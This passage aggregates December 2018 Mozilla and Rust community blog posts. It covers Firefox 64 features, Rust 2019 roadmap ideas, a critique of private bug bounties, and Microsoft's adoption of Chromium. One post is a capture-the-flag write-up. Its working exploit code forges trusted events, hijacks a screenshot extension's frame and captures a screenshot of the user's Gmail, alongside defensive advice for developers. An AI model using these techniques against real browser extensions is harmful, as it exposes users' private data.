  • menus.update() can now be used to update the icon of an existing menu item.
  • Extensions can now detect which mouse button was used when a menu item was clicked — this can be found using the new button property of menus.OnClickData.

Custom content in the Dev Tools inspector

Also, add-ons can now display custom content within the Dev Tools Inspector sidebar by calling the new sidebar.setPage() API.

Managing add-ons updated

For users, the add-on management interface, about:addons, was redesigned to match Firefox’s preferences page, and right-clicking an add-on icon in the browser toolbar now offers options to directly remove or manage that add-on.

Privacy features for your protection

Symantec CA Distrust

Due to a history of malpractice, Firefox 64 will not trust TLS certificates issued by Symantec (including under their GeoTrust, RapidSSL, and Thawte brands). Microsoft, Google, and Apple are implementing similar measures for their respective browsers.

Referrer-Policy for stylesheets

The Referrer-Policy header now applies to requests initiated by CSS (e.g., background-image: url("http://...") ). The default policy, no-referrer-when-downgrade, omits referrer information when a secure origin (https) requests data from an insecure origin (http).

buildID fixed timestamp

Lastly, from now on the non-standard navigator.buildID property will always return a fixed timestamp, 20181001000000, to mitigate its potential abuse for fingerprinting.

Further Reading

For more information, see Firefox 64 for Developers on MDN, and the official Firefox 64 Release Notes. If you’re a web developer, you may also be interested in the Firefox 64 Site Compatibility notes.

The post Firefox 64 Released appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogLatest Firefox Release Available Today

It’s the season for spending time with family and friends over a nice meal and exchanging gifts. Whether it’s a monogrammed bag or a nicely curated 2019 calendar of family photos, it’s the practical gifts that get the most use.

For Firefox, we’re always looking for ways to simplify and personalize your online experience. For today’s version of Firefox for desktop, we have a couple new features that do just that. They include:

Contextual Feature Recommender (CFR)

Aimed at people who are looking to get more out of their online experience or ways to level up. CFR is a system that proactively recommends Firefox features and add-ons based on how you use the web. For example, if you open multiple tabs and repeatedly use these tabs, we may offer a feature called “Pinned Tabs” and explain how it works. Firefox curates the suggested features and notifies you. With today’s release, we will start to rollout with three recommended extensions which include: Facebook Container, Enhancer for YouTube and To Google Translate. This feature is available for US users in regular browsing mode only. They will not appear in Private Browsing mode. Also, Mozilla does NOT receive a copy of your browser history. The entire process happens locally in your copy of Firefox.

Multiple Tab Organization

When you go online, it’s not uncommon to have several tabs open on a variety of topics whether it’s dinner recipes or gift ideas for your family, it can add up to a lot of tabs. How does anyone ever organize all those tabs? In today’s release, you can now shift or ctrl-click multiple tabs from the tab bar, and organize them the way you want. You can mute, move, bookmark or pin them quickly and easily.

Here’s a link to our release notes for a complete list of what’s included in today’s release.

Check out and download the latest version of Firefox Quantum available here. For the latest version of Firefox for iOS, visit the App Store.

 

The post Latest Firefox Release Available Today appeared first on The Mozilla Blog.

Nick FitzgeraldRust 2019: Think Bigger

Rust shines when we find ways to have our cake and eat it too: memory safety without runtime garbage collection, abstraction without overhead, threading without data races. We must find new ways to continue this tradition for Rust 2019 and beyond.

On a day-to-day basis, I am dedicated to small, incremental progress. If a pull request is an improvement over the status quo, merge it now! Don’t wait for the pull request to be perfectly pristine or the feature to be 100% complete. Each day we drag reality inch by inch towards the ideal.

However, when planning on the scale of years, our vision must not be weighed down by discussion of incremental improvements: we must rise and collectively define the lofty ideals we aim for. It requires avoiding local maxima. Nick Cameron’s Rust in 2022 post, where he starts with what we might want in a Rust 2022 edition and then works backwards from there, is a great example.

With that out of the way, I will make a couple suggestions for the Rust 2019 roadmap. I will leave my thoughts for the Rust and WebAssembly domain working group’s 2019 roadmap for a future post.

Speed Up Compilation

Tired: make rustc faster.

Wired: integrate distributed compilation and artifact caching into cargo and crates.io.

Of course we should continue identifying and implementing performance wins in rustc itself. We should even invest in larger scale rearchitecting like adding finer-grained parallelism in with rayon (I won’t go into too many specifics here because I’m largely ignorant of them!)

But we should also be thinking bigger.

The fastest compilation is the one that you didn’t have to do. If we integrate something like sccache into cargo and crates.io, then individuals can download pre-built artifacts for common dependencies from a shared cache and save big on local CPU time. In comparison, a 5% speedup to trait resolution is peanuts. This is an opportunity that is not available to most language ecosystems! Most languages don’t have a compiler toolchain, build system, and package manager that are widely used together and well integrated.

First-Class, Domain-Specific Workflows

Tired: make wasm-pack really good.

Wired: make wasm-pack unnecessary by building generic task hooks into cargo itself.

Different domains have different workflows that extend past cargo build. With WebAssembly, we must also generate JavaScript bindings, run tools like wasm-opt, create a package.json to integrate with NPM and JavaScript tooling, etc… For embedded development, you need to at minimum flash your built program into your microcontroller’s persistent memory.

To perform these tasks today, we typically write whole new tools that wrap cargo (like wasm-pack), invoke external tools manually (like using openocd by hand), or write a cargo-mytask package to add the cargo mytask subcommand. These solutions suffer from either repetition and a lack of automation, or they wrap cargo but fail to expose all the wonderful features that cargo supports (for example, you can’t use the --feature flag yet with wasm-pack). We should not write these tools that wrap cargo, we should write generic build tasks, which are invoked automatically by cargo itself.

cargo should not just grow a post_build.rs hook, its build tasks and dependencies between tasks and artifacts should become fully extensible. I should be able to depend on wasm build tasks in my Cargo.toml, and then after that cargo build should just Do The Right Thing. I shouldn’t have to compile these wasm build tasks for every project I use them with. cargo and crates.io should handle transparently distributing the wasm task binaries to me.

Growing Working Groups

Tired: the Rust project should start a working group for $PROJECT_OR_DOMAIN.

Wired: the Rust project should have a working group template, and system of mentorship for new (and old!) working group leads.

The more we collaborate and work together, the better we can tackle problems that are larger than any one of us. The primary way we’ve been organizing technical efforts in the Rust project has been working groups. But starting a new working group is hard, and leading a working group is hard.

We should have a template for new working groups that comes with cookie-cutter steps to follow to help build an open community, articulate working group vision, and collectively organize. Of course these steps will need to evolve for each particular working group’s needs, but having something to help new working groups hit the ground running is incredibly valuable. It would have been so useful for me when we were kicking off the WebAssembly domain working group last year. A lot of things that are obvious in retrospect were not at the time: hold weekly meetings, adopt an RFC process, communicate(!!), create room for contributors to own sub-goals, etc…

Additionally, every working group lead should have a mentor who is in a leadership position within the Rust project: someone who is a member of the Rust core team or a lead of another working group or team. Someone to rubber duck with and seek guidance from in the context of leadership and organization.

Instead of enabling Rust users to ask Rust leadership for a working group for X, we should empower them to start the working group for X themselves, and we should continuously follow up to ensure that they succeed. To have our cake and eat it too, Rust development must be a positive-sum game.

#Rust2019

Whatever we end up with in the 2019 roadmap, I have faith that what we choose will be worthy. We don’t suffer from a lack of good options.

I hope we never stop dreaming big and being ambitious.

This Week In RustThis Week in Rust 264

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

#Rust2019

Crate of the Week

This week's crate is lsd, a colorful and fast ls replacement. Thanks to Pierre Peltier for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

264 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in final comment period.

Tracking Issues & PRs

New RFCs

No new RFCs were proposed this week.

Upcoming Events

Online
Asia Pacific
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

I'll know ide support is mature when the flame wars start.

– Unnamed friend of arthrowpod

Thanks to arthrowpod for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

Nick CameronRust in 2022

A response to the call for 2019 roadmap blog posts.

In case you missed it, we released our second edition of Rust this year! An edition is an opportunity to make backwards incompatible changes, but more than that it's an opportunity to bring attention to how programming in Rust has changed. With the 2018 edition out of the door, now is the time to think about the next edition: how do we want programming in Rust in 2022 to be different to programming in Rust today? Once we've worked that out, lets work backwards to what should be done in 2019.

Without thinking about the details, lets think about the timescale and cadence it gives us. It was three years from Rust 1.0 to Rust 2018 and I expect it will be three years until the next edition. Although I think the edition process went quite well, I think that if we'd planned in advance then it could have gone better. In particular, it felt like there were a lot of late changes which could have happened earlier so that we could get more experience with them. In order to avoid that I propose that we aim to avoid breaking changes and large new features landing after the end of 2020. That gives 2021 for finishing, polishing, and marketing with a release late that year. Working backwards, 2020 should be an 'impl year' - focussing on designing and implementing the things we know we want in place for the 2021 edition. 2019 should be a year to invest while we don't have any release pressure.

To me, investing means paying down technical debt, looking at our processes, infrastructure, tooling, governance, and overheads to see where we can be more efficient in the long run, and working on 'quality of life' improvements for users, the kind that don't make headlines but will make using Rust a better experience. It's also the time to investigate some high-risk, high-reward ideas that will need years of iteration to be user-ready; 2019 should be an exciting year!

The 2021 edition

I think Rust 2021 should be about Rust's maturity. But what does that mean? To me it means that for a programmer in 2022, Rust is a safe choice with many benefits, not a high-risk/high-reward choice. Choosing Rust for a project should be a competitive advantage (which I think it is today), but it should not require investment in libraries, training, or research.

Some areas that I think are important for the 2021 edition:

  • sustainability: Rust has benefited from being a new and exciting language. As we get more mature, we'll become less exciting. We need to ensure that the Rust project has sufficient resources for the long term, and that we have a community and governance structure that can support Rust through the (hopefully) long, boring years of its existence. We'll need to think of new ways to attract and retain users (as well as just being awesome).
  • diversity: Rust's community as a good reputation as a welcoming community. However, we are far from being a diverse one. We need to do more.
  • mature tools: Cargo must be more flexible, IDE support must be better, debugging, profiling, and testing need to be easy to use, powerful, and flexible. We need to provide the breadth and depth of tool support which users expect from established languages.
  • async programming: high-performance network programming is an amazing fit for Rust. Work on Linkerd and Fuchsia has already proved this out. Having a good story around async programming will make things even better. I believe Rust could be the best choice in this domain by a wide margin. However, building out the whole async programming story is a huge task, touching on language features, libraries, documentation, programming techniques, and crates. The current work already feels huge and I believe that this is only the beginning of iteration.
  • std, again: Rust's standard library is great, a point in favour of Rust. Since Rust 1.0 there have been steady improvements, but the focus has been on the wider ecosystem. I think for the next edition we will need to consider a second wave of work. There are some fundamental things that are worth re-visiting (e.g., Parking Lot mutexes), and a fair few things where our approach has been to let things develop as crates 'for now', and where we either need to move them into std, or re-think user workflow around discoverability, etc. (e.g., Crossbeam, Serde).
  • error handling: we really need to improve the ergonomics of error handling. Although the mechanism is (IMO) really great, it is pretty high-friction compared to exceptions. We should look at ways to improve this (Ok-wrapping, throws in function signatures, etc.). I think this is an edition issue since it will probably require a breaking change, and at the least will change the style of programming.
  • macros: we need to 'finish' macros, both procedural and declarative. That means being confident about our hygiene and naming implementation, iterating on libraries, stabilising everything, and supporting the modern macro syntax.
  • internationalisation: we need to do much better. We need internationalisation and localisation libraries on a path to stabilisation, either in std or discoverable and easily usable as crates. It should be as easy to print or use a multi-locale string as a single-locale one. We also need to do better at the project-level - more local conferences, localised documentation, better ways for non-English speakers to be part of the Rust community.

Let's keep focussing on areas where Rust has proven to be a good fit (systems, networking, embedded (both devices and as performance-critical components in larger systems), WASM, games) and looking for new areas to expand into.

2019

So, with the above in mind, what should we be doing next year? Each team should be thinking about what are the high-risk experiments to try. How can we tackle technical (and community) debt? What can be polished? Lets spend the year making sure we are on the right track for the next edition and the long-term by encouraging people to dedicate more energy to strategy.

Of course we want to plan some concrete work too, so in no particular order here are some specific ideas I think are worth looking into:

  • discoverability of libraries and tools: how does a new user find out about Serde or Clippy?
  • project infrastructure: are bors, homu, our repo structures, and our processes optimal? How can we make contributing to Rust easier and faster?
  • the RFC process: RFCs are good, but the process has some weaknesses: discussion is scattered around different venues, discussions are often stressful, writing an RFC is difficult, and so forth. We can do better!
  • project governance: we have to keep scaling and iterating. 2019 is a good opportunity to think about our governance structures.
  • moderation and 'tone' of discussion: we need to keep scaling moderation and think about better ways to moderate forums. Right now we do a good job of enforcing the CoC and removing egregious offenders, however, many of our forums can feel overwhelming or hostile. We should strive for more professional and considerate spaces.
  • security of Rust code: starting the secure code working group is very timely. I think we're going to have look closely at ways we can make using and working with Rust code safer. From changes to Cargo and crates.io, to reasoning about unsafe code.
  • games and graphics: as well as keeping going with the existing domain working groups, we should also look at games and graphics. Since these are such performance sensitive areas, Rust should be a good fit. There is already a small, but energetic community here and some initial uses in production.
  • async/await and async programming: we need to keep pushing here on all fronts (language, std, crates, docs, gaining experience)

And lets dive a tiny bit deeper into a few areas:

Dev-tools

  • Cargo: Cargo needs to integrate better into other build system and IDEs. There are a lot of places people want more flexibility, it will take another blog post to get into this.
  • More effort on making the RLS good.
  • Better IDE experience: more features, more polish, debugging and profiling integration.
  • integrating Rustdoc, docs.rs, and cargo-src to make a best-in-class documentation and source code exploration experience
  • work on a query API for the compiler to be a better base for building tools. Should support Clippy as well as the RLS, code completion, online queries, etc.

Language

Even more than the other areas, the language team needs to think about development cadence in preparation for the next edition. We need to ensure that everything, especially breaking changes, get enough development and iteration time.

Some things I think we should consider in 2019:

  • generic associated types or HKTs or whatever: we need to make sure we have a feature which solves the problems we need to solve and isn't going to require more features down the road (i.e., we should aim for this being the last addition to the trait system).
  • specialisation: is this going to work? I think that in combination with macros, there are some smart ways that we can work with error types and do some inheritance-like things.
  • keep pushing on unfinished business (macros, impl Trait, const functions, etc.).
  • named and optional arguments: this idea has been around for a while, but has been low priority. I think it would be very useful (there are some really ergonomic patterns in Swift that we might do well to emulate).
  • enum variant types: this is small, but I REALLY WANT IT!
  • gain experience with, and polish the new module system
  • identify and fix paper cuts

Compiler

Nothing really new here, but we need to keep pushing on compiler performance - it comes up again and again as a Rust negative. We should also take the timing opportunity to do some refactoring, for example, landing Chalk and doing something similar for name resolution.

Wladimir PalantIf your bug bounty program is private, why do you have it?

The big bug bounty platforms are structured like icebergs: the public bug bounty programs that you can see are only a tiny portion of everything that is going on there. As you earn your reputation on these platforms, they will be inviting you to private bug bounty programs. The catch: you generally aren’t allowed to discuss issues reported via private bug bounty programs. In fact, you are not even allowed to discuss the very existence of that bug bounty program.

I’ve been playing along for a while on Bugcrowd and Hackerone and submitted a number of vulnerability reports to private bug bounty programs. As a result, I became convinced that these private bug bounty programs are good for the bottom line of the bug bounty platforms, but otherwise their impact is harmful. I’ll try to explain here.

What is a bug bounty?

When you collect a bug bounty, that’s not because you work for a vendor. There is no written contract that states your rights and obligations. In its original form, you simply stumble upon a security vulnerability in a product and you decide to do the right thing: you inform the vendor. In turn, the vendor gives you the bug bounty as a token of their appreciation. It could be a monetary value but also some swag or an entry in the Hall of Fame.

Why pay you when the vendor has no obligation to do so? Primarily to keep you doing the right thing. Some vulnerabilities could be turned into money on the black market. Some could be used to steal data or extort the vendor. Everybody prefers people to earn their compensation in a legal way. Hence bug bounties.

What the bug bounty isn’t

There are so many bug bounty programs around today that many people made them their main source of income. While there are various reasons for that, one thing should not be forgotten: there is no law guaranteeing that you will be paid fairly. No contract means that your reward is completely dependent on the vendor. And it is hard to know in advance, sometimes the vendor will claim that they cannot reproduce, or downplay severity, or mark your report as a duplicate of a barely related report. In at least some cases there appears to be intent behind this behavior, the vendor trying to fit the bug bounty program into a certain budget regardless of the volume of the reports. So any security researcher trying to make a living from bug bounties has to calculate pessimistically, e.g. expecting that only one out of five reports will get a decent reward.

On the vendor’s side, there is a clear desire for the bug bounty program to replace penetration tests. Bugcrowd noticed this trend and is tooting their bug bounty programs as the “next gen pen test.” The trouble is, bug bounty hunters are only paid for bugs where they can demonstrate impact. They have no incentives to report minor issues, not only will the effort of demonstrating the issue be too high for the expected reward, it also reduces their rating on the bug bounty platform. They have no incentives to point out structural weaknesses, because these reports will be closed as “informational” without demonstrated impact. They often have no incentives to go for the more obscure parts of the product, these require more time to get familiar with but won’t necessarily result in critical bugs being discovered. In short, a “penetration test” performed by bug bounty hunters will be everything but thorough.

How are private bug bounties different for researchers?

If you feel that you are treated unfairly by the vendor, you have essentially two options. You can just accept it and vote with your feet: move on to another bug bounty program and learn how to recognize programs that are better avoided. The vendor won’t care as there will be plenty of others coming their way. Or you can make a fuzz about it. You could try to argue and probably escalate to the bug bounty platform vendor, but IMHO this rarely changes anything. Or you could publicly shame the vendor for their behavior and warn others.

The latter is made impossible by the conditions to participate in private bug bounty programs. Both Bugcrowd and Hackerone disallow you from talking about your experience with the program. Bug bounty hunters are always dependent on the good will of the vendor, but with private bug bounties it is considerably worse.

But it’s not only that. Usually, security researchers want recognition for their findings. Hackerone even has a process for disclosing vulnerability reports once the issue has been fixed. Public Bugcrowd programs also usually provision for coordinated disclosure. This gives the reporters the deserved recognition and allows everybody else to learn. But guess what: with private bug bounty programs, disclosure is always forbidden.

Why will people participate in private bug bounties at all? Main reason seems to be the reduced competition, finding unique issues is easier. In particular, when you join in the early days of a private bug bounty program, you have a good opportunity to generate cash with low hanging fruit.

Why do companies prefer private bug bounties?

If a bug bounty is about rewarding a random researcher who found a vulnerability in the product, how does a private bug bounty program make sense then? After all, it is like an exclusive club and unlikely to include the researcher in question. In fact, that researcher is unlikely to know about the bug bounty program, so they won’t have this incentive to do the right thing.

But the obvious answer is: the bug bounty platforms aren’t actually selling bug bounty management, they are selling penetration tests. They promise vendors to deliver high-quality reports from selected hackers instead of the usual noise that a public bug bounty program has to deal with. And that’s what many companies expect (but don’t receive) when they create a private bug bounty.

There is another explanation that seems to match many companies. These companies know perfectly well that they just aren’t ready for it yet. Sometimes they simply don’t have the necessary in-house expertise to write secure code, so even with they bug bounty program always pointing out the same mistakes they will keep repeating them. Or they won’t free up developers from feature work to tackle security issues, so every year they will fix five issues that seem particularly severe but leave all the others untouched. So they go for a private bug bounty program because doing the same thing in public would be disastrous for their PR. And they hope that this bug bounty program will somehow make their product more secure. Except it doesn’t.

On Hackerone I also see another mysterious category: private bug bounty programs with zero activity. So somebody went through the trouble of setting up a bug bounty program but failed to make it attractive to researchers. Either it offers no rewards, or it expects people to buy some hardware that they are unlikely to own already, or the description of the program is impossible to decipher. Just now I’ve been invited to a private bug bounty program where the company’s homepage was completely broken, and I still don’t really understand what they are doing. I suspect that these bug bounty programs are another example of features that somebody got a really nice bonus for but nobody cared putting any thought into.

Somebody told me that their company went with a private bug bounty because they work with selected researchers only. So it isn’t actually a bug bounty program but really a way to manage communication with that group. I hope that they still have some other way to engage with researchers outside that elite group, even if it doesn’t involve monetary rewards for reported vulnerabilities.

Conclusions

As a security researcher, I’ve collected plenty of bad experiences with private bug bounty programs, and I know that other people did as well. Let’s face it: the majority of private bug bounty programs shouldn’t have existed in the first place. They don’t really make the products in question more secure, and they increase frustration among security researchers. And while some people manage to benefit financially from these programs, others are bound to waste their time on them. The confidentiality clauses of these programs substantially weaken the position of the bug bounty hunters, which isn’t too strong to start with. These clauses are also an obstacle to learning on both sides, ideally security issues should always be publicized once fixed.

Now the ones who should do something to improve this situations are the bug bounty platforms. However, I realize that they have little incentive to change this situation and are in fact actively embracing it. So while one can ask for example for a way to comment on private bug bounty programs so that newcomers can learn from the experience that others made with this program, such control mechanisms are unlikely to materialize. Publishing anonymized reports from private bug bounty programs would also be nice and just as unlikely. I wonder whether the solution is to add such features via a browser extension and whether it would gain sufficient traction then.

But really, private bug bounty programs are usually a bad idea. Most companies doing that right now should either switch to a public bug bounty or just drop their bug bounty program altogether. Katie Moussouris is already very busy convincing companies to drop bug bounty programs they cannot make use of, please help her and join that effort.

Wladimir PalantBBN challenge resolution: Exploiting the Screenshotter.PRO browser extension

The time has come to reveal the answer to my next BugBountyNotes challenge called Try out my Screenshotter.PRO browser extension. This challenge is a browser extension supposedly written by a naive developer for the purpose of taking webpage screenshots. While the extension is functional, the developer discovered that some websites are able to take a peek into their Gmail account. How does that work?

If you haven’t looked at this challenge yet, feel free to stop reading at this point and go try it out. Mind you, this one is hard and only two people managed to solve it so far. Note also that I won’t look at any answers submitted at this point any more. Of course, you can also participate in any of the ongoing challenges as well.

Still here? Ok, I’m going to explain this challenge then.

Taking control of the extension UI

This challenge has been inspired by the vulnerabilities I discovered around the Firefox Screenshots feature. Firefox Screenshots is essentially a built-in browser extension in Firefox, and while it takes care to isolate its user interface in a frame protected by the same-origin policy, I discovered a race condition that allowed websites to change that frame into something they can access.

This race condition could not be reproduced in the challenge because the approach used works in Firefox only. So the challenge uses a different approach to protect its frame from unwanted access: it creates a frame pointing to https://example.com/ (the website cannot access it due to same-origin policy), then injects its user interface into this frame via a separate content script. And since a content script can only be injected into all frames of a tab, the content script uses the (random) frame name to distinguish the “correct” frame.

And here lies the issue of course. While the webpage cannot predict what the frame name will be, it can see the frame being injected and change the src attribute into something else. It can load a page from the same server, then it will be able to access the injected extension UI. A submission I received for this challenge solved this even more elegantly: by assigning window.name = frame.name it made sure that the extension UI was injected directly into their webpage!

Now the only issue is bringing up the extension UI. With Firefox Screenshots I had to rely on the user clicking “Take a screenshot.” The extension in the challenge allowed triggering its functionality via a hotkey however. And, like so often, it failed checking for event.isTrusted, so it would accept events generated by the webpage. Since the extension handles events synchronously, the following code is sufficient here:

window.dispatchEvent(new KeyboardEvent("keydown", {
  key: "S",
  ctrlKey: true,
  shiftKey: true
}));
let frame = document.getElementsByTagName("iframe")[0];
frame.src = "blank.html";

Recommendation for developers: Any content which you inject into websites should always be contained inside a frame that is part of your extension. This at least makes sure that the website cannot access the frame contents, but you still have to worry about clickjacking and spoofing attacks.

Also, if you ever attach event listeners to website content, always make sure that event.isTrusted is true, so it’s a real event rather than the website playing tricks on you.

What to screenshot?

Once the webpage can access the extension UI, clicking the “Screenshot to clipboard” button programmatically is trivial. Again Event.isTrusted is not being checked here. However, even though Firefox Screenshots only accepted trusted events, it didn’t help it much. At this point the webpage can make the button transparent and huge, so when the user clicks somewhere the button is always triggered.

The webpage can create a screenshot, but what’s the deal? With Firefox Screenshots I only realized it after creating the bug report, the big issue here is that the webpage can screenshot third-party pages. Just load some page in a frame and it will be part of the screenshot even though you normally cannot access its contents. Only trouble: really critical sites such as Gmail don’t allow being loaded in a frame these days.

Luckily, this challenge had to be compatible with Chrome. And while Firefox extensions can use tabs.captureTab method to capture a specific tab, there is nothing comparable for Chrome. The solution that the hypothetical extension author took was using tabs.captureVisibleTab method which works in any browser. Side-effect: the visible tab isn’t necessarily the tab where the screenshotting UI lives.

So the attacks starts by asking the user to click a button. When clicked, that button opens Gmail in a new tab. The original page stays in background and initiates screenshotting. When the screenshot is done it will contain Gmail, not the attacking website.

How to get the screenshot?

The last step is getting the screenshot which is being copied to clipboard. Here, a Firefox bug makes things a lot easier for attackers. Until very recently, the only way to copy something to clipboard was calling document.execCommand() on a text field. And Firefox doesn’t allow this action to be performed on the extension’s background page, so extensions will often resort to doing it in the context of web pages that they don’t control.

The most straight-forward solution is registering a copy event listener on the page, it will be triggered when the extension attempts to copy to the clipboard. That’s how I did it with Firefox Screenshots, and one of the submitted answers also uses this approach. But I actually forgot about it when I created my own solution for this challenge, so I used mutation observers to see when a text field is inserted into the page and read out its value (the actual screenshot URL):

let observer = new MutationObserver(mutationList =>
{
  for (let mutation of mutationList)
  {
    if (mutation.addedNodes && mutation.addedNodes[0].localName == "textarea")
      document.body.innerHTML = `<p>Here is what Gmail looks like for you:</p><img src="${mutation.addedNodes[0].value}">`;
  }
});
observer.observe(document.body, {childList: true});

I hope that the new Clipboard API finally makes things sane here, so it isn’t merely more elegant but also gets rid of this huge footgun. But I didn’t have any chance to play with it yet, this API only being available since Chrome 66 and Firefox 63. So the recommendation is still: make sure to run any clipboard operations in a context that you control. If the background page doesn’t work, use a tab or frame belonging to your extension.

The complete solution

That’s pretty much it, everything else is only about visuals and timing. The attacking website needs to hide the extension UI so that the user doesn’t suspect anything. It also has no way of knowing when Gmail finishes loading, so it has to wait some arbitrary time. Here is what I got altogether. It is one way to solve this challenge but certainly not the only one.

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Screenshotter.PRO browser extension (solution)</title>
    <script>
      function runAttack()
      {
        let targetWnd = window.open("https://gmail.com/", "_blank");

        window.dispatchEvent(new KeyboardEvent("keydown", {
          key: "S",
          ctrlKey: true,
          shiftKey: true
        }));

        let frame = document.getElementsByTagName("iframe")[0];
        frame.src = "blank.html";
        frame.style.visibility = "hidden";
        frame.addEventListener("load", () =>
        {
          // Leave some time for gmail.com to load
          window.setTimeout(function()
          {
            frame.contentDocument.getElementById("do_screenshot").click();

            let observer = new MutationObserver(mutationList =>
            {
              for (let mutation of mutationList)
              {
                if (mutation.addedNodes && mutation.addedNodes[0].localName == "textarea")
                {
                  targetWnd.close();
                  document.body.innerHTML = `<p>Here is what Gmail looks like for you:</p><img src="${mutation.addedNodes[0].value}">`;
                }
              }
            });
            observer.observe(document.body, {childList: true});
          }, 2000);
        });
      }
    </script>
  </head>
  <body>
    <button onclick="runAttack();">Click here for a surprise!</button>
  </body>
</html>

Ryan HarterSlow to respond through 2018

I'm working on an urgent and high priority request for the next few weeks. To make sure I can finish this work in 2018 I'm limiting my meetings and communications for the remainder of the year.

Slack is good for getting my immediate attention, but if your request takes more than a one word response it's likely to get lost in the shuffle. If you need me to take some action filing a bug is your best bet. If you don't want to file a bug, email is fine. Keep in mind that my response time will be very slow during this time.

If you need immediate help, try the following:

  • If your question is about a search analysis or new search telemetry, please contact bmiroglio AT mozilla.com
  • If your question is about search data, see the documentation here. If that doesn't help, contact wlach AT mozilla.com
  • For general data science questions contact rweiss AT mozilla.com
  • For general telemetry questions, ask #fx-metrics on Slack or #datapipeline on IRC

Otherwise, I'll get back to you as soon as I can! Thanks for your understanding.

Cameron KaiserTenFourFox FPR11 available

TenFourFox Feature Parity Release 11 final is now available for testing (downloads, hashes, release notes). Issue 525 has stuck, so that's being shipped and we'll watch for site or add-on compatibility fallout (though if you're reporting a site or add-on that doesn't work with FPR11, or for that matter any release, please verify that it still worked with prior versions: particularly for websites, it's more likely the site changed than we did). There are no other changes other than bringing security fixes up to date. Assuming no problems, it will go live tomorrow evening as usual.

FPR12 will be a smaller-scope release but there will still be some minor performance improvements and bugfixes, and with any luck we will also be shipping Raphaël's enhanced AltiVec string matcher in this release as well. Because of the holidays, family visits, etc., however, don't expect a beta until around the second week of January.

The Mozilla BlogGoodbye, EdgeHTML

Microsoft is officially giving up on an independent shared platform for the internet. By adopting Chromium, Microsoft hands over control of even more of online life to Google.

This may sound melodramatic, but it’s not. The “browser engines” — Chromium from Google and Gecko Quantum from Mozilla — are “inside baseball” pieces of software that actually determine a great deal of what each of us can do online. They determine core capabilities such as which content we as consumers can see, how secure we are when we watch content, and how much control we have over what websites and services can do to us. Microsoft’s decision gives Google more ability to single-handedly decide what possibilities are available to each one of us.

From a business point of view Microsoft’s decision may well make sense. Google is so close to almost complete control of the infrastructure of our online lives that it may not be profitable to continue to fight this. The interests of Microsoft’s shareholders may well be served by giving up on the freedom and choice that the internet once offered us. Google is a fierce competitor with highly talented employees and a monopolistic hold on unique assets. Google’s dominance across search, advertising, smartphones, and data capture creates a vastly tilted playing field that works against the rest of us.

From a social, civic and individual empowerment perspective ceding control of fundamental online infrastructure to a single company is terrible. This is why Mozilla exists. We compete with Google not because it’s a good business opportunity. We compete with Google because the health of the internet and online life depend on competition and choice. They depend on consumers being able to decide we want something better and to take action.

Will Microsoft’s decision make it harder for Firefox to prosper? It could. Making Google more powerful is risky on many fronts. And a big part of the answer depends on what the web developers and businesses who create services and websites do. If one product like Chromium has enough market share, then it becomes easier for web developers and businesses to decide not to worry if their services and sites work with anything other than Chromium. That’s what happened when Microsoft had a monopoly on browsers in the early 2000s before Firefox was released. And it could happen again.

If you care about what’s happening with online life today, take another look at Firefox. It’s radically better than it was 18 months ago — Firefox once again holds its own when it comes to speed and performance. Try Firefox as your default browser for a week and then decide. Making Firefox stronger won’t solve all the problems of online life — browsers are only one part of the equation. But if you find Firefox is a good product for you, then your use makes Firefox stronger. Your use helps web developers and businesses think beyond Chrome. And this helps Firefox and Mozilla make overall life on the internet better — more choice, more security options, more competition.

The post Goodbye, EdgeHTML appeared first on The Mozilla Blog.

Mozilla Future Releases BlogFirefox Coming to the Windows 10 on Qualcomm Snapdragon Devices Ecosystem

At Mozilla, we’ve been building browsers for 20 years and we’ve learned a thing or two over those decades. One of the most important lessons is putting people at the center of the web experience. We pioneered user-centric features like tabbed browsing, automatic pop-up blocking, integrated web search, and browser extensions for the ultimate in personalization. All of these innovations support real users’ needs first, putting business demands in the back seat.

Mozilla is uniquely positioned to build browsers that act as the user’s agent on the web and not simply as the top of an advertising funnel. Our mission not only allows us to put privacy and security at the forefront of our product strategy, it demands that we do so. You can see examples of this with Firefox’s Facebook Container extension, Firefox Monitor, and its private by design browser data syncing features. This will become even more apparent in upcoming releases of Firefox that will block certain cross-site and third-party tracking by default while delivering a fast, personal, and highly mobile experience.

When we set out several years ago to build a new version of Firefox called Quantum, one that utilized multiple computer processes the way an operating system does, we didn’t simply break the browser into as many processes as possible. We investigated what kinds of hardware people had and built a solution that took best advantage of processors with multiple cores, which also makes Firefox a great browser for Snapdragon. We also offloaded significant page loading tasks to the increasingly powerful GPUs shipping with modern PCs and we re-designed the browser front-end to bring more efficiency to everyday tasks.

Today, Mozilla is excited to be collaborating with Qualcomm and optimizing Firefox for the Snapdragon compute platform with a native ARM64 version of Firefox that takes full advantage of the capabilities of the Snapdragon compute platform and gives users the most performant out of the box experience possible. We can’t wait to see Firefox delivering blazing fast experiences for the always on, always connected, multi-core Snapdragon compute platform with Windows 10.

Stay tuned. It’s going to be great!

The post Firefox Coming to the Windows 10 on Qualcomm Snapdragon Devices Ecosystem appeared first on Future Releases.

Hacks.Mozilla.OrgRust 2018 is here… but what is it?

This post was written in collaboration with the Rust Team (the “we” in this article). You can also read their announcement on the Rust blog.

Starting today, the Rust 2018 edition is in its first release. With this edition, we’ve focused on productivity… on making Rust developers as productive as they can be.

